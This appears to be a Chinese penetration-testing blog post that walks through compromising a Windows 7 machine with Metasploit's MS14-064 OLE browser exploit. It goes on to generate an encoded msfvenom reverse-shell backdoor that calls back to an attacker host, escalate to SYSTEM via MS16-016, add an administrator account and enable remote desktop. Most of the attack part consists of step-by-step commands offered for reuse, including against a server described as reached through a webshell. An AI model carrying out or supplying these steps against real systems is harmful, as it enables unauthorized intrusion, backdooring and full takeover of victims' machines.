喜迎
元旦

MS14-064 漏洞测试入侵Win7


开始渗透

Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术.

远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 – Win10+IE11全版本.

metasploit里已经加入了此漏洞的利用模块 :exploit/windows/browser/ms14_064_ole_code_execution

执行命令:

msfconsole    //启动MSF

search ms14   //搜索关键字

use exploit/windows/browser/ms14_064_ole_code_execution  // 加载漏洞利用模块

set payload windows/meterpreter/reverse_tcp    //设置反弹连接shell

如图:

需要注意的是箭头标记的属性默认为false 需要设置为true ,因为msf中自带的漏洞利用exp调用的是 powershell.

所以msf(Metasploit Framework)中的exp代码只对安装powershell的系统生效。win7系统安装自带powershell,所以这里测试受害的机器为windows7 32位.

按照图中各个属性配置好后 执行:

exploit

即可 .

到一个URL地址,复制到受害者机器(win7)测试

当用户点击允许了后,可以看见这边反弹了一个shell, 测试成功。

用MSF进行提权

在WEB渗透中拿到webshell了,我们可以试试用MSF(metasploit)来进行提权,在MSF里meterpreter很强大的!先用msfvenom生成一个EXE的木马后门:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.1.7 LPORT=4444 -f exe > abc.exe

然后在到MSF根据刚才配置的木马后门进行监听,然后在把木马上传到服务器(受害者)的机器里,必须上传到可读可写的目录下.

这里我把abc.exe上传到了C:\users\leak\desktop\目录下,abc.exe就是刚才生成的后门.

然后在执行的后门,可以看见MSF弹回了一个session 1(会话连接).说明后门程序成功执行起来了,当然你也可以在webshell执行的,但必须的有一点执行的权限.

getuid //可以看见权限很低,一般都是user权限的,但也遇到过某些服务器执行后就直接是system最高权限.像这种就直接加用户.

这里是user权限,我们要把它提升到system权限,Windows最高权限。

接着输入命令 :

background     //把你当前的metasploit shell转为后台执行。

search ms16  // 搜索关键字相关的漏洞

然后我选择了MS16-016这个漏洞在进行提权 :

use exploit/windows/local/ms16_016_webdav //  选择漏洞

show options  //查看漏洞里边要设置的参数

可以看见只有一个SESSION参数要设置 :

set  SESSION 1 // 设置会刚才我们后门连接的ID号 1

可以看见成功的吧漏洞利用到了PID为692的进程中,虽然提权成功了 但你getuid下还是看见的是user权限:

ps一下查看进程

根据刚才的提示找到PID 692的进程,可以看见确实是system权限.

所以还要用到migrate 命令 //迁移到一个指定的进程ID.

migrate 692  //

在getuid下可以看见为system权限 .

既然有了system权限 那我们在添加账号hack,添加为管理员组

用Nmap扫下并没有开启远程登陆3389 .

run getgui -e  //开启目标主机3389 

貌似这条MSF命令只对2003的系统有效 执行几次都没成功 , 所以就用cmd命令开了3389端口 .

提权成功,登录服务器 .


文章作者: Ming xin
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Ming xin !
评论
  目录